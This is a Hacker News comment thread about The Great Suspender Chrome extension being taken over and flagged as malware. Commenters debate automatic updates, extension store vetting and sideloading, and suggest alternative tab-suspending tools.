traviscj wrote: | There's also the occasional _necessity_ for making a | breaking change, in particular _breaking some exploit_ | and thereby making the software more secure. | | I don't envy Chrome leadership's decision or having that | problem to solve. | shawnz wrote: | I don't think the question is about control but rather | whether automatic updates, when intentionally activated | by the user, contribute more positively to the system's | security than negatively. | | Without automatic updates, you might be more inclined to | put off a patch which turns out to be urgent. Or you | might be more likely to lose track of which patches have | been applied across your various systems. | spiffytech wrote: | Auto-update is a mixed bag. We got into auto-update as a | standard practice over the last decade because a large | fraction of users never updated anything, so security issues | would linger forever (not to mention ancient software | versions holding back platform technologies, and financial | concerns for software shops). | | So it's not that auto-update is flatly a bad idea, it's more | that it's a trade-off that sometimes makes security issues | almost evaporate, and sometimes makes them impossible to | dodge. | mkj wrote: | I think the difference with browser extensions is the | anonymity and speed of changing owners. There's more momentum | to notice big companies going downhill (+- stuff like | sourceforge) | Anthony-G wrote: | I recently had to install Certbot on a CentOS 8 server and | discovered that the Certbot documentation recommeds using Snap | (for almost every popular GNU/Linux release). They have their | reasons[1]. I figured it was time to investigate using Snap and | the benefits it could provide. | | While researching, I found many users reporting that forced | updates of software installed by Snap caused many problems and | I decided against using it; I was able to install Certbot via a | good old-fashioned RPM from EPEL. | | I also removed Snap from a different Ubuntu server which had | recently been upgraded to 20.04 (I wasn't using LXD on that | server so there was no need for it). | | 1. https://community.letsencrypt.org/t/how-to-install- | certbot-w... | | FWIW, I've been allowing Apt and Yum package managers to | automatically update for about 8 years without any problems. | The only manual OS updating I do is for a set of physical (non- | virtual) servers that are operational 24/7. | nakodari wrote: | Thanks for this! I've been using this extension for a long time | and just removed it today. Honestly, with Macbook Air M1 there is | no need for suspending tabs any more because the battery life is | amazing, so that also helps. | weakboi wrote: | Ironically, I tracked the real world identity of someone using | stolen credit cards in my ecom site BECAUSE he posted a | tutorial/how-to on YouTube showing the vulnerability tool (script | kiddie), under his real name. SMH. This won't stop this | information from being disseminated, but it may save some idiots | from themselves. | mendelmaleh wrote: | I expected this to be about Jack Dorsey/twitter xD | Androider wrote: | In Chrome, make sure you set your less frequently used extensions | to run "On click" instead of "On all sites". Extensions -> | extension details -> Site access. | | For dev tools and such, I set a whitelist of the sites they're | allowed to run on, using that same extension details page. | There's no need for your JSON formatter etc. to run on every | single page you visit. Also speeds up browsing. | brundolf wrote: | Among other things, this is why when people say "HN doesn't need | a dark mode, just use an extension", that isn't a valid solution. | For years now I've refused to install any extensions that aren't | too-big-to-compromise (which in practice - for me - means AdBlock | Plus and maybe React Dev Tools), and that should be everyone's | policy. Any extension whose compromise wouldn't damage the | reputation of a billion-dollar organization is simply too juicy | of an attack vector. | raunakdag wrote: | It's funny you mention AdBlock Plus but not uBlock Origin in | this situation. I'd say the latter is much, much better than | the former. | brundolf wrote: | But is it better _known_? That 's the determining factor | here. The Great Suspender was well-regarded in certain | circles, and even fairly well-known (I've never used it but | I've heard of it). But even it apparently wasn't above | compromise. To be reasonably safe, an extension has to either | be a) so well-known that they'd never be able to get away | with silently adding malware (because someone would notice, | which to be fair is what happened here), or b) tied to a | major brand that wouldn't want to sell out to some shady | firm, on PR grounds alone. | bijant wrote: | This is really Google's fault. They make it impossible to turn | off automatic updates for Chrome extensions from their store. | That would be kind-of-ok if they actually had a rigorous approval | process. But they don't. The Chrome Web Store has become one of | the prime Vectors for malware. The only way to be safe is to | exclusively download releases from the extensions github repo and | to manually install them. | Kagerjay wrote: | I never even patch automatic updates to my OS either (e.g. OS | bigSur). I'd rather not guinea pig the latest updates and they | usually don't add all that much value for chrome extension | releases either, so a way to turn off automatic updates in | chrome is highly desirable for me. | | Download and unpacking from github is a pita, I'd need to do | this to each of my computers seperately | smt88 wrote: | This is a terrible security practice. | | Switch to Chromium and use a package manager to stay up to | date. Don't freeze updates, especially on your browser. | sokoloff wrote: | I work in software. I know the dangers of a day 0 exploit. | I also know the dangers of an x.0 release of software. | | Security is often in tension with convenience/usability (as | in this case). | | Concretely: I don't update to the latest MacOS day of | release. I do update after a few weeks of "no significant | issues reported" (or I'll update manually faster if I learn | of a serious exploit). I still haven't updated to BigSur as | some of the software that I rely on doesn't work on BigSur | yet, so I'm on the latest patch of Catalina. | jrochkind1 wrote: | I'm not going to update to a new MacOS "named" release | until it's been out for a while and probably has a patch | release or two, agreed. | | But I install MacOS patch releases as soon as they are | offered. It has never caused me a problem I am aware of, | and I don't want to miss out on security patches, or even | just bugfixes and perf improvements. | | Heck, I actually just upgraded a MacBook that was still | on 10.12, which was EOL'd. But I upgraded it _because_ it | was EOL 'd, and wasn't getting patch releases for | security fixes, and I want those patch releases as soon | as they are released! | smt88 wrote: | You should let clients and users know that you care more | about convenience than security so that they can make an | informed decision about whether to trust their data with | you. | | I don't know what x.0 software updates you're talking | about (Chrome or Mac), but my comment never mentioned | any. You don't seem to know that browser vendors don't | really do those like OS vendors do. Either way, you can | still avoid those while gettong security updates. | | In my memory, there hasn't been a breaking auto-update in | Chrome in years, but there have been hundreds of 0-days. | The numbers don't really work out for the tradeoff you | claim to be making. | simias wrote: | I don't think turning automatic updates would be the right way | to deal with this. See: Windows. If a piece of software becomes | malware it needs to either be forked or retired completely, | running unmaintained legacy versions of software is not | sustainable. | | I have plenty of things I want to complain about when it comes | to Google's user-adversity but mandatory automatic updates is | definitely not one of them. | | If you're a technical user and really know (or really think | that you know) what you're doing there are ways to effectively | freeze a given version of an extension. | [deleted] | sn_master wrote: | Or just add permissions and ask the user when the extension | asks for new ones? e.g. permission to talk to the outside world | that something like TGS shouldn't need to just do its job. | LegitShady wrote: | >The only way to be safe is to exclusively download releases | from the extensions github repo and to manually install them. | | Or not use chrome | metalliqaz wrote: | The fact that Google has not addressed this gaping security | hole in Chrome is borderline criminal. | stevenhuang wrote: | You can do better to voice your displeasure by not stretching | credulity. | metalliqaz wrote: | It's hyperbole. Welcome to the Internet. | AlexandrB wrote: | In general, taking control away from users sets up all kind of | bad incentives. For example, automatic updates with no way to | downgrade save vendors from having to compete with their own | older versions. This means regressions in functionality or | design can be pushed out with little recourse for users other | than complaining online. This is compounded by ecosystem lock- | in and lack of data portability. The software industry as a | whole is heading towards treating users more and more | paternalistically. | duxup wrote: | On the other hand users are generally pretty poor at managing | software themselves and as long as it works they'll happily | and probably ignorantly run something that is not secure | already and needs an update. | CaptArmchair wrote: | > users are generally pretty poor at managing software | | This is an assertion which begs many questions. | | Who are these users? What do you mean by "generally"? What | do you mean by "poor"? What do you mean with "managing | software"? Which software specifically? Why is "managing | software" hard? What are specific case where this might be | true? Is this statement falsifiable? | | For instance, how does age, social background, education | level, language, culture,... factor into the experience of | "managing software"? Sure, the problem can't be software | itself in it's entirety? | | See, statements like these tend to break down once you | start digging into the murky nuances and specificities of | reality. | | Moreover, accepting them at face value tends to reinforce a | belief which isn't based on fact: that the users of digital | technology can't manage their devices, and therefore | shouldn't be confronted with managing their devices. | | ... which is then translated and implemented in interfaces | and systems that simply lack the functionality that gives | users fine grained control over what is or isn't installed. | | Over a longer term, this promotes a form of "lazy thinking" | in which users simply don't question what happens under the | hood of their devices. Sure, people are aware of the many | issues concerning privacy, personal data, security and so | on. But ask them how they could make a meaningful change, | and the answers will be limited to what's possible within | the limitations of what the device offers. | | A great example of this would be people using a post-it to | cover the camera in the laptop bezel. | | People don't know what happens inside their machine, they | don't trust what happens on their machine, and there's no | meaningful possibility to look under the hood and come to a | proper understanding... so they revert to the next sensible | thing they have: taping a post-it over the lens. | | The post-it doesn't solve the underlying issue - a lack of | understanding which was cultivated - but it does solve a | particular symptom: the inability to control what that | camera does. | strken wrote: | I, and everyone else I know, do not install updates to | our software in a timely manner unless we actively need a | feature. | | Users are "I, and everyone else I know". | | Generally is "unless we need a feature". | | Poor is "do not install updates to our software". | | Managing software is "install updates". | | Software is any software we use that provides updates, | which is all of it. | | Managing software is hard because doing it manually would | require checking the website of every piece of software | you've ever downloaded at regular intervals, where | regular could be as frequently as minutes for security- | critical tools. | | If I ever downgrade my software and lock it to a specific | version, I am now managing it manually, and all of the | above applies. | | I honestly don't think there are unquestioned assumptions | here, because the task of keeping security-critical | software up to date manually is nearly impossible for any | user. | devonbleak wrote: | It really doesn't beg those questions - we have 25+ years | of data backing it up. People across the board are bad | about running updates. I'm guessing you missed the mid- | late 90s when things like buffer overflows started to be | exploited and firewalls became necessities because even | the folks whose job it was to run updates of vulnerable | systems with public IPs on the Internet... weren't. Then | came the early 2000s and all the worms running amok | because people still weren't running their updates. Then | the collective web development industry screamed in pain | because things like Windows XP and IE6 just would not | die. | | The collective Internet has been through this before and | (mostly) learned its lesson. People don't run updates | when it's not shoved down their throat. And it's not a | small segment of people. And it hasn't changed. Look at | how many hacks still happen because of servers and apps | that aren't patched for known vulnerabilities. Or the | prevalence of cryptojacking which is still largely based | on known vulnerabilities that already have patches | available - indicating it's successful enough that people | keep doing it. | | Most users don't question what happens under the hood of | their devices because they don't care. They have other | things to care about that actually mean something to them | besides the nuances of the day to day maintenance of | their devices. There does not exist an effective way of | making people care about things like this, let alone | educating the masses on how to appropriately choose which | commit hash of their favorite browser extension they | should really be on. How many security newsletters do you | really expect the average person to be subscribed to in | order to make informed decisions about these things? | | Hell my "Update" notification on Chrome is red this | morning and I'm at least in the top 10% of security- | conscious folks in the world (it's really not a high | bar). | | I'm not saying automatic updates are without their | problems - I'm in a thread on HN about that exact thing. | But trying to claim it's somehow about sociodemographic | issues and the answer is solving that and going back to | selectively running updates is just ignoring the lessons | of the past. | duxup wrote: | I honestly am not at all sure what you mean by much of | that. | | Demographics don't change the fact that if you don't | automatically update software, many users simply won't. | That's bad. | jjkaczor wrote: | ... in the usual pedantry of HN your use of "poor" was | interpreted to mean socio-economic, rather than... "just | bad at something"... | duxup wrote: | Oh I see. That's, weird, but thanks for letting me know. | Someone wrote: | I don't see how one could parse _"On the other hand users | are generally pretty poor at managing software | themselves"_ and assign that interpretation to _"poor"_. | duxup wrote: | I agree, but the user who responded to me seemed to talk | about demographics as if I had meant "poor" as in not | having much money. | | The internet is global, sometimes I think things get lost | in translation. | wolco5 wrote: | That would cover users who are poor at managing software. | Being able to turn them off would require someone to be | good at managing software. Why remove control from those | users? | duxup wrote: | I want to think that folks who would chose that option | would be responsible, but the amount I hear from other | developers who defer updates on Windows 10 to the maximum | (1 year...) and still are upset when they have to reboot | makes me think that even experienced users present a | risk. | ziml77 wrote: | I don't _want_ to be saying that we should remove | control, but I actually do think it 's reasonable to. | Even on a single-user device, security issues are not | isolated. An infected machine will likely be used for | things like spam and DDOS. | | If you make something available for people to toggle that | improves their experience, people are going to take | advantage of that even if they don't really grasp or | decide to ignore the consequences. In the case of updates | the improved experience is not being nagged or forced to | restart an application or the whole OS. And unfortunately | the only way to really gatekeep that control to people | who know what they're doing is giving it enterprise | pricing. | iamben wrote: | Conversely, before automatic updates web developers were | stuck supporting Internet Explorer for the best part of | twenty years. Many of the people using it had neither reason | or knowledge to update it, and it became the reason my | parent's computers got riddled with malware. | | There's a sensible middle ground here. Take the paternalistic | approach that (generally) protects people like my mum. Add | settings that allow people like you and me to turn off | updates or roll backwards. Push the people controlling the | updates (like the Chrome store) to better protect their | users. | marcosdumay wrote: | Internet Explorer was only replaced by automatic updates | _after_ its usage felt enough that sites stopped supporting | it. | ryandrake wrote: | Users need to be motivated to upgrade. If their current | software works sufficiently on the sites they care about, | then they have no need to upgrade. If the sites themselves | are enabling this behavior, by bending over backwards to | work on with old browsers, then they are part of the | "problem". | | I don't like automatic updates and generally keep them | disabled. Software upgrades tend to reduce functionality | and instead force unnecessary UX redesigns on users, so I'd | rather avoid them. I _wish_ developers had the [EDIT: | incentive] to release security patches independently from | functionality changes, but few do that anymore, sadly. | ComodoHacker wrote: | >I wish developers had the competence to release security | patches independently from functionality changes, but few | do that anymore, sadly. | | You do realize it's not competence developers are | lacking, it's resources that are finite, do you? | iamben wrote: | It's been an age since I've worked in an agency, but back | in the IE era, at least once a month a dev would ask to | use a 'modern feature'. Something to support some a new | piece of design from the design team, or save hours or | days of dev, or remove the need for hacky 'fixes' that | could be done cleanly with modern browser support. | | So off to analytics they would go. "X thousand users are | using IE8. We're converting at X%. Removing support for | IE8 just means these people will shop elsewhere and we'll | lose X thousand pounds a month. You need to support IE8." | | Believe me, I wish it was as simple as saying developers | are "part of the problem," because it would be an easy | fix. But try selling that (without a huuuuge struggle!) | to the person who holds the purse strings. | | Sadly the new features usually only came on new sites. | It's much easier to push it through when you're not | cutting off an existing income stream. | corty wrote: | Despite automatic updates, web developers are still stuck | with Safari, IE, old android browsers and old edge. | Automation doesn't help with bugs and functionality if | there are just no updates to be installed that fix bugs and | bring new functionality. | username90 wrote: | The major problem with internet explorer was that it was | impossible to update without updating windows which costs | money so most people and organizations didn't do it. | mikewarot wrote: | >Conversely, before automatic updates web developers were | stuck supporting Internet Explorer for the best part of | twenty years. Many of the people using it had neither | reason or knowledge to update it, and it became the reason | my parent's computers got riddled with malware. | | The failure is not that of Internet Explorer, but rather | the OS in which it runs, which has a faulty security model. | No operating system should trust executables with | everything by default. | Spivak wrote: | It wasn't faulty at the time since people were more | concerned about protecting computers from users than | protecting users from applications. | | We all seem to forget that computing has changed | _drastically_ in the last decade. | ColonelPhantom wrote: | I would say that "protecting users from applications" (or | at least, external attackers) has been commonplace for | maybe even two decades now, ever since major malware | 'plagues' of the early 2000's (pre-SP2 Windows XP) like | Blaster or Sasser. | | That said, in that era it was often assumed (more so than | now) that software the user installed himself is trusted. | Cthulhu_ wrote: | I don't mind automatic updates per se as long as they're | thoroughly checked and vetted. I'm not convinced Android and | the Chrome web store do ANY checking / vetting. I have more | trust in Apple's stores. | | Vetting could be better with a lot of companies as well; | remember not so long ago when Windows Defender decided a | critical system file was malware and broke a ton of systems? | | Verification. Vetting. Gradual release. Automatically disable | extensions if they changed ownership, or if there's | suspicious activity on the account of the owner (e.g. new | login in another country). | | And they need to take a MUCH harder stance on malware. Right | now they're not even acknowledging there's a problem, let | alone acting on it. | londons_explore wrote: | For any extension that makes any money, the solution is a | deposit scheme. | | "Google will withhold $1 per user of your ad revenue | forever. If your extension is found to contain malware, you | forfeit all the $1's. Decisions on malware'y ness shall be | made by XYZ malware researchers." | | Allow a developer to get back their $1 when a user | uninstalls the extension, or the developer stops making the | extension. Also give the developer a certificate anytime | showing how many $1's you hold of theirs (they could use | that to get a loan from someone willing to trust them not | to distribute malware). | PetahNZ wrote: | Not really a solution, just the minimum price a buyer | would need to pay. | londons_explore wrote: | True. But even the most profitable malware won't want to | forfeit hundreds of millions of dollars for a popular | chrome extension. | jrochkind1 wrote: | Users never upgrading their software certainly also leads to | security problems though, it's not a solution, and it is | reasonable to try to set things up so this doesn't happen. | ThisIsTheWay wrote: | Wouldn't an easy solution be to turn auto updates on by | default, and warn users that turn it off that they are | opening themselves up to potential security issues, and to do | so wisely? | velosol wrote: | The issue comes when an auto update regresses something | that the user relied upon. As long as the automatic update | has a 'downgrade' option that's tenable but most of the | solutions out there make downgrading difficult. | | I prefer automatic updates that are presented to the user | for action, sadly feature update/release notes are often | hidden or content-free (cf. Google's apps' updates on the | Play Store) and downgrading path varies heavily with OS | (easy on Linux, impossible on iOS). | Paul-ish wrote: | I keep most of my extensions disabled most of the time. A lot of | the extensions have particular uses and don't always need to be | active. | imedadel wrote: | I recently switched to Auto Tab Discard.[1] It uses the browser's | built-in tab suspending. It doesn't have all the features of TGS, | though. | | Edit: OneTab[2] is also pretty good when you have lots of tabs | open for research or work. | | [1]: https://github.com/rNeomy/auto-tab-discard | | [2]: https://www.one-tab.com/ | anotheryou wrote: | perfect! I was looking for [1] the other day. Plays nicely with | sideberry which uses the same api but can't do "unload all | other tabs". | Debug_Overload wrote: | I've been using it for the last few weeks, and it's been pretty | good so far. It doesn't suspend music tabs when they're not | playing (which TGS did automatically), but nothing much to | complain about. | ext_dev wrote: | Was once approached by a company who had software that would | allow me to install affiliate links on Google Searches results by | installing a third party on my extension. | | Had about 50k active users at the time and was making around | EUR1.8k a month.[1] To be honest, users were informed on the | install flow and most people didn't care what I was doing. | Probably how Hola unblocker still has 8M. | | Google understandably told me to remove it. | | Donations inside extensions offer near nothing. Doesn't feel like | a extension that can offer a paid tier. | | It's a dirty but effective way to generate an income stream | relatively quickly. Even more so, if you wash your hands from it | and walk away. | | I'm surprised Google hasn't taken it down completely, as it | breaks the single use policy. | | [1] https://i.imgur.com/M4CD9CB.png | SiteRelEnby wrote: | Either the second or third time it lost all my tabs was when I | stopped trusting it. | frob wrote: | Google Chrome now has tab grouping. In Beta, you can click on the | group name and collapse the tabs. Based on their reload times, it | seems chrome suspends the tabs in the background when you | collapse the group. | katsura wrote: | Oh, this is awesome. I'm on Linux so I've been using Chromium, | where this is already available. Pretty neat. | | Edit: looks like it works in Chrome as well. | nottheonion wrote: | This looks promising. To activate the suspend on collapse | feature enter "chrome://flags/" into the address bar and make | sure these experimental features are "enabled": #tab-groups, | #tab-groups-collapse, #tab-groups-collapse-freezing. I also | enabled: #tab-groups-auto-create. | EGreg wrote: | And this is why we need to rethink how we do software | distribution. | | Package managers are nice for the lazy, but then we get stuff | like this: | | https://qz.com/646467/how-one-programmer-broke-the-internet-... | | Actually you might be pulling a bunch of malicious updates in 2-3 | modules deep in your dependency tree anytime. | | As a society we should be moving away from a culture of | "immediate" updates eg on Twitter etc. And go towards more "peer | review" like in science. Otherwise we are putting responsibility | on every individual to verify all sides of the story and get | informed. They don't and society gets more and more dicided. | Imagine if a scientist tweeted at 3am and half their followers | instantly believed them. Or if an open source contributor's pull | request was instantly accepted and pulled overnight by everyone. | That's why USA and other countries are now so divided | politically. Individual responsibility of 100% of the downstream | nodes is strange to outsource responsibility to. | | I wrote about this back in 2012 predicting what would happen: | | https://magarshak.com/blog/?p=114 | Mediterraneo10 wrote: | Recently I wanted to build one of Signal's libraries so that I | could use it with signal-cli. It astonished me that building | this secure messenger requires automatically downloading a | whole host of third-party dependencies through wget from some | disparate repositories, which presumably had received little | vetting. | | What happened to the notion of using stable, centralized | package repositories like Debian's or Red Hat's in order to | build one's software? I did a lot of Free Software development | in the early millennium, then was away from the scene for a few | years, and when I came back this desire for convenience above | all else really baffles me. | EGreg wrote: | At Qbix, we have built everything in-house and the few | dependencies that we do pull in, we vetted and pinned the | versions. People have criticized us for that in the past but | if we are ever to get past trusting large, centralized | entities for our server back ends, we need to make sure to | kick the open source movement to the next level: | | https://qbix.com/blog/2021/01/15/open-source-communities/ | | https://qbix.com/blog/2018/01/17/modern-security- | practices-f... | specialist wrote: | Thanks for sharing. | | I'm now framing the problem as "inauthentic speech". | | > _...go towards more "peer review" like in science._ | | Ditto journalism and reporting. | | This is a universal problem. The core solution remains the | same. Cite your sources Show your work | Sign your name | | WRT John Walker's screed, I really thought certificates and web | of trust would have become the norm by now. Anything unsigned | would be treated as gossip or worse. Certs could be revoked as | needed. | | Further, every trusted digital relationship would start with a | key exchange. Vs relying on username and password. eg Banks | would issue me a Secure Enclave of some sort, like a USB fob. | | I'd like to understand why this didn't happen. My best guess is | "Worse is better" enabled predators and parasites. Which has | been acceptable during the gold rush. | tus88 wrote: | "Shady" take-over of plugins/apps is just a big a suspicious fail | as allowing apps to gain access to all contacts on mobile phones. | | Google never really cared about user privacy at all. | cwwc wrote: | Lifesaver. Much obliged, davidfstr. | facorreia wrote: | That's why I don't trust Chrome extensions. There have been too | many instances of a popular instance being taken over to run | malware. I don't think Google's handling of these security issues | has been adequate. | AlexCoventry wrote: | Is there a tool which will automatically reload _all_ your | extensions from disk, as described in the OP? Seems like a | sensible default, from a security perspective. | nojito wrote: | Sleeping Tabs is a feature on MS Edge. | | https://www.windowscentral.com/microsoft-edge-canary-can-put... | bugfix wrote: | Wow, my Chrome RAM usage went from about 2GB to 8GB after | removing TGS. | aitchnyu wrote: | Why didnt browsers start warning users when an extension updated | after changing owners? | davidfstr wrote: | <nope>The owner in the extension metadata on The Great | Suspender hasn't been updated (to my understanding) so the | Chrome Web Store doesn't even know that the owner has been | changed.</nope> | | Actually it does appear that the owner was changed from | "deanoemcke" to "thegreatsuspender" (the new mystery owner) on | the Chrome Web Store page. | | I agree that warning when updating an extension if the stated | owner has changed would be valuable. | kburman wrote: | Here's list of other extensions which have been recently flagged | by community for similar behaviour | | - Auto Refresh Premium, static.trckljanalytic.com | | - Stream Video Downloader, static.trckpath.com | | - Custom Feed for Facebook, api.trackized.com | | - Notifications for Instagram, pc.findanalytic.com | | - Flash Video Downloader, static.trackivation.com | | - Ratings Preview for YouTube, cdn.webtraanalytica.com | | Copied from | https://github.com/greatsuspender/thegreatsuspender/issues/1... | sn_master wrote: | I wonder how many of those tracking websites or even the | extensions themselves are owned by the same entity. That's a | pretty common practice. | ramraj07 wrote: | My general policy is to never install any extension that has | full browser acceess. Except if it's from the faang companies | themselves. | ant6n wrote: | I wonder whether paying for extensions could be a way to build | more trust. | rplnt wrote: | Is there an extension that can track my extensions? | jhloa2 wrote: | I was just thinking about something similar. It would be nice | if at a minimum, we could put together a list of compromised | extensions. I feel like I've seen quite a few of these | reports recently | pault wrote: | It should be possible to look at the source code of known | compromised extensions and put together a list of | heuristics that could automate part of the process. | Minifiers make it more difficult though. | Bayart wrote: | You should be able to do some of that at the debug console | level. But otherwise you're stuck tracking traffic at page | level, at least as far as I know. | zerd wrote: | My wife installed an addon to be able to post Instagram posts | from her laptop, and then suddenly clicking on google search | results would sometimes, but not always hijack and redirect to | bing, and then click on one of the ads. But it was clever | because it only happened sometimes, and if she retried it it | didn't happen, so whenever she would try to show me, it didn't | happen. I just removed all her addons and the problem went way, | so not sure which one it was. | ufmace wrote: | It's things like this that make me a lot more reluctant to | install extensions that might be moderately convenient. Maybe | they're okay now, but it's too much of a burden to keep track | of what I have installed and which ones are known to be doing | something nasty. | | Another loser in this whole game is the honest hobby extension | developers, who have to deal with the power-users who might | promote their extensions not wanting to bother for fear of not | being able to keep a watch for potential malicious updates for | all of them. | AlphaWeaver wrote: | Quick note about the workaround mentioned in this article - the | suggestion to download the last known good version of the | extension and sideload it is a good one, but it has some problems | on Chrome. | | Chrome has features to dissuade users from installing extensions | from outside the Chrome Web Store. If you load an unpacked | extension, Chrome will issue an ominous warning (something like | "this extension is untrusted, click here to uninstall") on every | launch. | | One could argue this is for security, but this change was | implemented around the same time that Google disabled the ability | to self-host extensions that install into Chrome. Really this is | a mechanism to shut out independent extension developers from any | potential plausible third-party distribution method that doesn't | rely on the Chrome Web Store (which Google controls and | aggressively moderates.) | | Use Firefox. | nousermane wrote: | > Chrome will issue an ominous warning on every launch. | | That's google's shtick. They do the same if you unlock | bootloader on your android phone. Black nag screen with scary | text on every reboot. | tyingq wrote: | You could download it and publish it yourself. I have a | extension I wrote myself, and while I occasionally see | something about having to pay $5 in the extension management | panel, it never forces me to do so. If they closed that hole, | perhaps it's worth the $5 developer registration fee to some. | AlphaWeaver wrote: | When did you publish your extension? I'm an extension | developer that makes a mildly popular extension used by a | niche group (1-2k MAU) and the Chrome Web Store has tightened | their policies over the years. It's possible that you're | grandfathered in (and haven't hit any of the extra reporting | requirements if you haven't updated your extension recently.) | | Extensions these days go through a rigorous review process, | and Google regularly shuts down / imposes arbitrary | restrictions against extensions due to changing policies. | | I understand the importance of strong moderation to protect | users from malicious extensions, but I believe Google is | using that as an excuse to further _lock down_ their store, | increasing barriers to entry and making it harder for | developers to build software to extend the most popular | browser in the world without Google 's blessing. | tyingq wrote: | I hadn't looked at it for a while, so I just did so. | | You're right...it won't let me update it now without a lot | of justifications on their privacy tab. However, it is | still published. The status is "Status: Published - | unlisted", so I can't search for it, but I can go direct to | the store url for it. | AlphaWeaver wrote: | Yeah, that matches up with what I've seen. They've at | least been decent enough not to kick people off the | store, but I don't think it's possible to just have them | sign / publish something unlisted these days without a | good deal of policy writing and justifications. | | Yet the large actors still publish malicious updates to | extensions. -\\_(tsu)_/- | tyingq wrote: | They have this "private" feature now where you have to | list the email addresses of people that are allowed to | use the extension. I don't see why that couldn't be | coupled with "no review required", so long as the list is | relatively short. But, yeah, likely will never happen. | | Fortunately for me, I can re-do my extension to use the | JS postMessage api which won't require hardly any | permissions, and thus, not much to review. | kobalsky wrote: | > Chrome has features to dissuade users from installing | extensions from outside the Chrome Web Store. If you load an | unpacked extension, Chrome will issue an ominous warning | (something like "this extension is untrusted, click here to | uninstall") on every launch. | | I've been sideloading vimium and thegreatsuspender for years | and I haven't seen this message ever. Not on Mac nor Linux. | squaresmile wrote: | I'm pretty sure if you enable Extension Developer Mode, you | won't get that nagging message on launch. | gcatalfamo wrote: | There is another problem by sideloading the extension: you | don't have cloud sync anymore, thus forcing you to sideload on | every computer you have. | [deleted] | TedDoesntTalk wrote: | > Use Firefox. | | Firefox has similar restrictions... you have to side load | through Developer Options. If you're not a developer, you will | be questioning why you're doing this and the less-technically | inclined will simply never do it (like my wife) | | And it is not entirely nefarious as you suggest. It limits the | damage that sideloaded extensions did roughly 2010 and earlier. | The WebExtension API was another assault on extensions. These | days, chrome and Firefox have essentially closed a huge attack | vector even though extensions are a shadow of their former | selves. I was a skeptic for a long time (why should power users | pay for the faults of everyone else?) but no more. Kudos. | kibwen wrote: | _> you have to side load through Developer Options_ | | I'm not sure what screen "Developer Options" is referring to, | but you can load add-ons directly from your hard drive with | no fuss from the Add-ons page (though you must be running the | Nightly or Developer version of Firefox). Click the gear icon | right above your list of installed add-ons (this is also the | menu that lets you disable auto-updates). | driverdan wrote: | Installing extensions from a file is supported in the | latest mainline FF (84.0.2), nightly or dev are not | required. I currently have one installed. It just shows a | confirmation dialog and then installs it. | bovine3dom wrote: | This is true but misleading: the extension you install | from file has to be signed by Mozilla in exactly the same | way that extensions on the store are signed. | Arnavion wrote: | You can remove the signature requirement on stable by | setting `xpinstall.signatures.required` to `false` in | your user.js / about:config | | (I wrote most the extensions I installed for my own | bespoke use, built locally as zip files and installed via | "Install Add-on From File...", and I don't have a problem | trusting myself.) | bovine3dom wrote: | I don't think this is is true for the official Mozilla | builds (except for Nightly, Beta and unbranded). It's | possible that your distro has a custom build that allows | the setting. Arch builds Firefox with `--allow-addon- | sideload` which could be the culprit. | Arnavion wrote: | Ah indeed. My distro also builds with `--allow-addon- | sideload` | bovine3dom wrote: | No promises that that's actually the right flag. I had a | rummage around searchfox and it looks like that just | enables extensions that have been placed in special | directories (whether they must be signed or not is a | different flag). There clearly is a setting somewhere | though as the unbranded builds exist... | jannes wrote: | So you have to use an experimental version of Firefox. | These nightly versions are less tested and can be a serious | downgrade from any stable browser. | | That's hardly what "Use Firefox" implied. | Semaphor wrote: | The Developer Edition is not a nightly build, it's a beta | build, so there has been some testing (Before I switched | to stable, I only once had an issue). Your point stands | though. | bovine3dom wrote: | You can use unbranded builds which are pretty much | identical to the stable releases but let you use unsigned | extensions. | | https://wiki.mozilla.org/Add- | ons/Extension_Signing#Unbranded... | kibwen wrote: | I can see why you'd think that but in practice I assure | you that your concern is unwarranted. I've been using | Nightly Firefox exclusively for almost ten years and I | honestly can't remember it ever crashing (excluding the | times when I was manually futzing with experimental | about:config flags back in the electrolysis days). | | As for the developer edition, it's literally the version | that they expect web developers to use; it's not half- | baked software by any means. | kchr wrote: | "Stable" doesn't necessary medan that it is secure, from | an end-user perspective. | AlphaWeaver wrote: | Chrome sideloads extensions through a similarly obscure menu | - My main quarrel is the prompt where the _default option is | to uninstall_ that appears on every launch. Firefox doesn 't | have that. | | Firefox also permits self-hosting extensions signed through | their store, providing more freedom for extension developers. | asddubs wrote: | yeah i kind of hate it but i can't really blame them for | doing it, since before they did that, if you installed | software from questionable sources like, say, java from the | oracle website, it would bundle an ask toolbar with it. and | this was so common | Karunamon wrote: | _Kudos?_ | | Availability is part of security, and the most secure system | is disconnected from the internet and powered off. Why are we | cheering our software becoming _less_ useful in the name of | safety? The switch to WebExtensions was a monstrous loss of | functionality! | [deleted] | albertgoeswoof wrote: | Or you can use https://www.one-tab.com/ or https://tab.bz for a | similar-ish use case | TheRealPomax wrote: | Is there a reason this extension still exists, given that tabs | get heavily deprioritized when not in focus, and have been for | many, many versions now? | spiffytech wrote: | Chrome throttles tab CPU activities when backgrounded, but | doesn't clear memory for the tab. For users like me who usually | have 50-800 tabs open across all my browser windows, that | _really_ adds up. I also appreciate (err... appreciated) The | Great Suspender because I didn 't want _all_ of those tabs | active _every_ time I opened a browser, so I 'd have scores of | tabs that never even got loaded, but were ready to go the | moment I wanted to return to them. | shawnz wrote: | Chrome does discard the memory of tabs that haven't been used | recently and Great Suspender can be configured to make use of | that functionality. | dbbk wrote: | They get throttled but still kept in memory. This drops them | from memory. | alyandon wrote: | The MS Edge dev channel has a basic form of tab suspending built | into it now. Based on my non-rigorous testing it seems to | actually save more memory than TGS ever did so I just removed the | extension entirely. | | It is really a shame that basic functionality like this isn't | built into more browsers and we have to rely on extensions to | fill the gaps just to keep memory usage under control for tab-a- | holics like myself. :( | davidfstr wrote: | > It is really a shame that basic functionality like this isn't | built into more browsers and we have to rely on extensions to | fill the gaps just to keep memory usage under control for tab- | a-holics like myself. :( | | The way I see it, extension developers get to come up with | innovative new features first, and then the first-party vendors | like Apple, Google, and Microsoft take note and eventually do | just that: Integrate it into their own products. | | For example: The Great Suspender - Sleeping Tabs [experimental] | (Microsoft/Edge); Flux - Night Shift (Apple/iOS); Growl - macOS | Notifications (Apple/macOS); Swype - iOS Built-in Keyboard | (Apple/iOS); etc | | Edit: Fix formatting. | shawnz wrote: | In fact tab suspending/discarding has been built into Chrome | for some time now and Great Suspender does optionally make use | of the built-in functionality. | | I still sometimes use extensions like Great Suspender to give | more control over the process (e.g. to suspend more | aggressively on RAM-constrained machines or where the user uses | a lot of tabs). | | Since this news came out I have switched to "Auto Tab Discard". | jannes wrote: | Chromium-based browsers and Firefox have discarding built-in. | | chrome://discards/ has some advanced options (in Chromium-based | browsers). | | 